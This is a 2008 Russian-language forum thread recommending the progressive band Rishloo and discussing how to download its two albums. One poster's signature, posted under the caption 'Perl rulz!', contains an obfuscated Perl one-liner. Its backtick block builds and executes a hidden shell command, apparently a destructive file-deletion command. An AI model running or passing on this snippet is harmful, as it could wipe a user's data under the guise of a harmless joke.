Добавлено: Пт Мар 07, 2008 5:08 pm Заголовок сообщения: Rishloo
На мой взгляд весьма интересная группа!! Одна из моих любимых! В каком стиле играют точно сказать не могу... хотя слышал что это Progressive - Metal... но самому мне так не кажется! Rishloo полюбому оценят любители группы Tool т.к. между ними просматриваются сходства (а найти музыку похожую на музыку тулов ох как не просто...).
Вобщем любителям красивой, мелодичной музыки и хорошего вокала настоятельно рекомендую!!!
...и ещё.... всего у них на данный момент 2 альбома: Terras Fames (2004) и Eidolon (2007).... из которых дебютник меня порадовал чуть больше))) ....хотя... может это просто потому что я его первым услышал....
Добавлено: Сб Мар 08, 2008 12:19 am Заголовок сообщения:
Зацени обязательно!) ...а после вырази своё мненрие по этому поводу!!!) ...оч интересно)) _________________ Your halo slipping down.... to choke you now.
Добавлено: Вт Мар 11, 2008 9:56 pm Заголовок сообщения:
energ0N
у меня на выходных девушка болела, извиняюсь, не успел _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Сб Мар 15, 2008 10:12 pm Заголовок сообщения:
energ0N
у меня с ифолдера не качает _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Сб Мар 15, 2008 10:55 pm Заголовок сообщения:
energ0N
Тут народ в большинстве своём тяжёлый на подъём. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Сб Мар 15, 2008 11:06 pm Заголовок сообщения:
А у нас тарифы изменились и теперь у меня 64/64.В следующем месяце планирую перейти на другой.Всего на червонец дороже,а скорость 128/128. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Пн Мар 17, 2008 9:32 pm Заголовок сообщения:
вот и кинь на мегоаплоад в таком случае ) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!